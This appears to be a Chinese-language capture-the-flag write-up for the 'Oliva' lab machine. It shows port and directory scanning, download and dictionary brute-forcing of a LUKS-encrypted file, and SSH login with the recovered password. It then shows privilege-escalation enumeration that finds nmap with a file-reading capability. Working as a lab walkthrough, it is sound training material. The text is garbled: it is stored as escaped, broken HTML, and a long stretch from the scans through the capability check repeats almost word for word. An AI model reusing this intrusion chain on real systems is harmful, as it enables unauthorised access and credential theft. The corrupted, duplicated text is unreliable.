![\"image-20240421153802801\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715599.png\")
<\/div>\n
![\"image-20240421154000423\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715601.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\nrustscan -a 192.168.0.104 -- -A\n\nOpen 192.168.0.104:80\nOpen 192.168.0.104:22\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKq\/kHQkF02bmDYzOAD\/qpiCHDR97iXI1oNT4\/xeNcpIBmtOTI1NEY8dzAmGqpviQswx99Xc1WUXCJG5NUgf8bE=\n| 256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDERBi20HARO1lSqDbLVqQPspJ1HJA1KDXGblcp9T\/cN\n80\/tcp open http syn-ack nginx 1.22.1\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,bak\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 69]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
![\"image-20240421154201850\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/192.168.0.104\/index.php<\/code><\/pre>\nHi oliva, Here the pass to obtain root: CLICK!<\/code><\/pre>\n\u4e0b\u8f7d\u4e00\u4e0b\u4ed6\u7ed9\u7684\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ wget http:\/\/192.168.0.104\/oliva \n--2024-04-21 03:43:52-- http:\/\/192.168.0.104\/oliva\nConnecting to 192.168.0.104:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 20000000 (19M) [application\/octet-stream]\nSaving to: \u2018oliva\u2019\n\noliva 100%[=========================================================================>] 19.07M --.-KB\/s in 0.07s \n\n2024-04-21 03:43:52 (257 MB\/s) - \u2018oliva\u2019 saved [20000000\/20000000]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ ls -la\ntotal 19540\ndrwxr-xr-x 2 kali kali 4096 Apr 21 03:43 .\ndrwxr-xr-x 56 kali kali 4096 Apr 21 03:39 ..\n-rw-r--r-- 1 kali kali 20000000 Jul 4 2023 oliva\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ file oliva \noliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n
\nLUKS (Linux Unified Key Setup) \u662f\u4e00\u79cd\u7528\u4e8eLinux\u548c\u5176\u4ed6\u7c7bUnix\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u5168\u76d8\u52a0\u5bc6\u6807\u51c6\u3002\u5b83\u4e3a\u5b58\u50a8\u8bbe\u5907\uff08\u5982\u786c\u76d8\u5206\u533a\u3001\u56fa\u6001\u786c\u76d8\u6216USB\u9a71\u52a8\u5668\uff09\u63d0\u4f9b\u4e86\u900f\u660e\u7684\u3001\u57fa\u4e8e\u5bc6\u7801\u7684\u52a0\u5bc6\u673a\u5236\u3002<\/p>\n
\n- \u521d\u59cb\u5316\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup luksFormat \/dev\/device --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000<\/code><\/li>\n- \u6253\u5f00\uff08\u5373\u6302\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup open \/dev\/device myencryptedvolume<\/code><\/li>\n- \u5728\u6253\u5f00\u7684\u52a0\u5bc6\u8bbe\u5907\u4e0a\u521b\u5efa\u5e76\u683c\u5f0f\u5316\u6587\u4ef6\u7cfb\u7edf\uff1a
mkfs.ext4 \/dev\/mapper\/myencryptedvolume<\/code><\/li>\n- \u6302\u8f7d\u6587\u4ef6\u7cfb\u7edf\u4f9b\u6b63\u5e38\u4f7f\u7528\uff1a
mount \/dev\/mapper\/myencryptedvolume \/mnt\/secure<\/code><\/li>\n- \u5173\u95ed\uff08\u5373\u5378\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup close myencryptedvolume<\/code><\/li>\n<\/ul>\n<\/blockquote>\n<\/div><\/p>\n\u7206\u7834LUKS<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ chmod +x oliva \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ bruteforce-luks -t 4 -f \/usr\/share\/wordlists\/rockyou.txt -v 10 oliva\nWarning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.\n\nTried passwords: 0\nTried passwords per second: 0.000000\nLast tried password: password\n\n^C<\/code><\/pre>\n\u554a\u8fd9\u3002\u3002\u3002\u3002<\/p>\n
\u6211\u76f4\u63a5\u770b\u522b\u4eba\u7684wp\u4e86\uff0c\u8fd9\u4e2a\u53ef\u80fd\u662f\u6211\u8fd9\u8fb9\u7684\u73af\u5883\u914d\u7f6e\u6709\u70b9\u95ee\u9898\uff1a<\/p>\n
Password found: bebita<\/code><\/pre>\n\u7136\u540e\u6253\u5f00\u6587\u4ef6\uff1a<\/p>\n
cryptsetup luksOpen oliva temp\nbebita\ncd \/dev\/mapper\/\nls -la\nmount \/dev\/mapper\/temp \/mnt\ncd \/mnt\ncat mypass.txt\n# Yesthatsmypass!<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\noliva@oliva:~$ ls -la\ntotal 32\ndrwx------ 3 oliva oliva 4096 jul 4 2023 .\ndrwxr-xr-x 3 root root 4096 jul 4 2023 ..\nlrwxrwxrwx 1 oliva oliva 9 jul 4 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 oliva oliva 220 jul 4 2023 .bash_logout\n-rw-r--r-- 1 oliva oliva 3526 jul 4 2023 .bashrc\ndrwxr-xr-x 3 oliva oliva 4096 jul 4 2023 .local\n-rw-r--r-- 1 oliva oliva 807 jul 4 2023 .profile\n-rw------- 1 oliva oliva 24 jul 4 2023 user.txt\n-rw------- 1 oliva oliva 102 jul 4 2023 .Xauthority\noliva@oliva:~$ cat user.txt \nHMVY0H8NgGJqbFzbgo0VMRm\noliva@oliva:~$ sudo -l\n-bash: sudo: orden no encontrada\noliva@oliva:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\noliva@oliva:~$ \/usr\/sbin\/getcap \/ 2>\/dev\/null\noliva@oliva:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/nmap cap_dac_read_search=eip\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\nnmap\u8bfb\u53d6\u6570\u636e\u5e93\u5bc6\u7801<\/h3>\n
nmap\u9614\u4ee5\u8bfb\u53d6\u6587\u4ef6\u3002<\/p>\n
rustscan -a 192.168.0.104 -- -A\n\nOpen 192.168.0.104:80\nOpen 192.168.0.104:22\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack OpenSSH 9.2p1 Debian 2 (protocol 2.0)\n| ssh-hostkey: \n| 256 6d:84:71:14:03:7d:7e:c8:6f:dd:24:92:a8:8e:f7:e9 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKq\/kHQkF02bmDYzOAD\/qpiCHDR97iXI1oNT4\/xeNcpIBmtOTI1NEY8dzAmGqpviQswx99Xc1WUXCJG5NUgf8bE=\n| 256 d8:5e:39:87:9e:a1:a6:75:9a:28:78:ce:84:f7:05:7a (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDERBi20HARO1lSqDbLVqQPspJ1HJA1KDXGblcp9T\/cN\n80\/tcp open http syn-ack nginx 1.22.1\n| http-methods: \n|_ Supported Methods: GET HEAD\n|_http-title: Welcome to nginx!\n|_http-server-header: nginx\/1.22.1\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.104\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,git,jpg,txt,bak\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url: http:\/\/192.168.0.104\/\n[+] Method: GET\n[+] Threads: 10\n[+] Wordlist: \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes: 404\n[+] User Agent: gobuster\/3.6\n[+] Extensions: php,zip,git,jpg,txt,bak\n[+] Timeout: 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.php (Status: 200) [Size: 69]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
<\/div><\/p>\n\u654f\u611f\u76ee\u5f55<\/h3>\nhttp:\/\/192.168.0.104\/index.php<\/code><\/pre>\nHi oliva, Here the pass to obtain root: CLICK!<\/code><\/pre>\n\u4e0b\u8f7d\u4e00\u4e0b\u4ed6\u7ed9\u7684\u6587\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ wget http:\/\/192.168.0.104\/oliva \n--2024-04-21 03:43:52-- http:\/\/192.168.0.104\/oliva\nConnecting to 192.168.0.104:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 20000000 (19M) [application\/octet-stream]\nSaving to: \u2018oliva\u2019\n\noliva 100%[=========================================================================>] 19.07M --.-KB\/s in 0.07s \n\n2024-04-21 03:43:52 (257 MB\/s) - \u2018oliva\u2019 saved [20000000\/20000000]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ ls -la\ntotal 19540\ndrwxr-xr-x 2 kali kali 4096 Apr 21 03:43 .\ndrwxr-xr-x 56 kali kali 4096 Apr 21 03:39 ..\n-rw-r--r-- 1 kali kali 20000000 Jul 4 2023 oliva\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ file oliva \noliva: LUKS encrypted file, ver 2, header size 16384, ID 3, algo sha256, salt 0x14fa423af24634e8..., UUID: 9a391896-2dd5-4f2c-84cf-1ba6e4e0577e, crc 0x6118d2d9b595355f..., at 0x1000 {"keyslots":{"0":{"type":"luks2","key_size":64,"af":{"type":"luks1","stripes":4000,"hash":"sha256"},"area":{"type":"raw","offse<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u8fd9\u662f\u4e2a\u5565\uff1a<\/p>\n
\nLUKS (Linux Unified Key Setup) \u662f\u4e00\u79cd\u7528\u4e8eLinux\u548c\u5176\u4ed6\u7c7bUnix\u64cd\u4f5c\u7cfb\u7edf\u4e2d\u7684\u5168\u76d8\u52a0\u5bc6\u6807\u51c6\u3002\u5b83\u4e3a\u5b58\u50a8\u8bbe\u5907\uff08\u5982\u786c\u76d8\u5206\u533a\u3001\u56fa\u6001\u786c\u76d8\u6216USB\u9a71\u52a8\u5668\uff09\u63d0\u4f9b\u4e86\u900f\u660e\u7684\u3001\u57fa\u4e8e\u5bc6\u7801\u7684\u52a0\u5bc6\u673a\u5236\u3002<\/p>\n
\n- \u521d\u59cb\u5316\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup luksFormat \/dev\/device --cipher aes-xts-plain64 --key-size 512 --hash sha512 --iter-time 5000<\/code><\/li>\n- \u6253\u5f00\uff08\u5373\u6302\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup open \/dev\/device myencryptedvolume<\/code><\/li>\n- \u5728\u6253\u5f00\u7684\u52a0\u5bc6\u8bbe\u5907\u4e0a\u521b\u5efa\u5e76\u683c\u5f0f\u5316\u6587\u4ef6\u7cfb\u7edf\uff1a
mkfs.ext4 \/dev\/mapper\/myencryptedvolume<\/code><\/li>\n- \u6302\u8f7d\u6587\u4ef6\u7cfb\u7edf\u4f9b\u6b63\u5e38\u4f7f\u7528\uff1a
mount \/dev\/mapper\/myencryptedvolume \/mnt\/secure<\/code><\/li>\n- \u5173\u95ed\uff08\u5373\u5378\u8f7d\uff09\u52a0\u5bc6\u5206\u533a\uff1a
cryptsetup close myencryptedvolume<\/code><\/li>\n<\/ul>\n<\/blockquote>\n<\/div><\/p>\n\u7206\u7834LUKS<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ chmod +x oliva \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Oliva]\n\u2514\u2500$ bruteforce-luks -t 4 -f \/usr\/share\/wordlists\/rockyou.txt -v 10 oliva\nWarning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.\n\nTried passwords: 0\nTried passwords per second: 0.000000\nLast tried password: password\n\n^C<\/code><\/pre>\n\u554a\u8fd9\u3002\u3002\u3002\u3002<\/p>\n
\u6211\u76f4\u63a5\u770b\u522b\u4eba\u7684wp\u4e86\uff0c\u8fd9\u4e2a\u53ef\u80fd\u662f\u6211\u8fd9\u8fb9\u7684\u73af\u5883\u914d\u7f6e\u6709\u70b9\u95ee\u9898\uff1a<\/p>\n
Password found: bebita<\/code><\/pre>\n\u7136\u540e\u6253\u5f00\u6587\u4ef6\uff1a<\/p>\n
cryptsetup luksOpen oliva temp\nbebita\ncd \/dev\/mapper\/\nls -la\nmount \/dev\/mapper\/temp \/mnt\ncd \/mnt\ncat mypass.txt\n# Yesthatsmypass!<\/code><\/pre>\nssh\u8fde\u63a5<\/h3>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\noliva@oliva:~$ ls -la\ntotal 32\ndrwx------ 3 oliva oliva 4096 jul 4 2023 .\ndrwxr-xr-x 3 root root 4096 jul 4 2023 ..\nlrwxrwxrwx 1 oliva oliva 9 jul 4 2023 .bash_history -> \/dev\/null\n-rw-r--r-- 1 oliva oliva 220 jul 4 2023 .bash_logout\n-rw-r--r-- 1 oliva oliva 3526 jul 4 2023 .bashrc\ndrwxr-xr-x 3 oliva oliva 4096 jul 4 2023 .local\n-rw-r--r-- 1 oliva oliva 807 jul 4 2023 .profile\n-rw------- 1 oliva oliva 24 jul 4 2023 user.txt\n-rw------- 1 oliva oliva 102 jul 4 2023 .Xauthority\noliva@oliva:~$ cat user.txt \nHMVY0H8NgGJqbFzbgo0VMRm\noliva@oliva:~$ sudo -l\n-bash: sudo: orden no encontrada\noliva@oliva:~$ find \/ -perm -u=s -type f 2>\/dev\/null\n\/usr\/bin\/newgrp\n\/usr\/bin\/umount\n\/usr\/bin\/chfn\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/gpasswd\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\noliva@oliva:~$ \/usr\/sbin\/getcap \/ 2>\/dev\/null\noliva@oliva:~$ \/usr\/sbin\/getcap -r \/ 2>\/dev\/null\n\/usr\/bin\/nmap cap_dac_read_search=eip\n\/usr\/bin\/ping cap_net_raw=ep<\/code><\/pre>\nnmap\u8bfb\u53d6\u6570\u636e\u5e93\u5bc6\u7801<\/h3>\n
nmap\u9614\u4ee5\u8bfb\u53d6\u6587\u4ef6\u3002<\/p>\n
![\"image-20240421154201850\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715602.png\")
<\/div><\/p>\n![\"image-20240421154837770\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715603.png\")
<\/div><\/p>\n![\"image-20240421170159924\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404211715604.png\")
<\/div><\/p>\n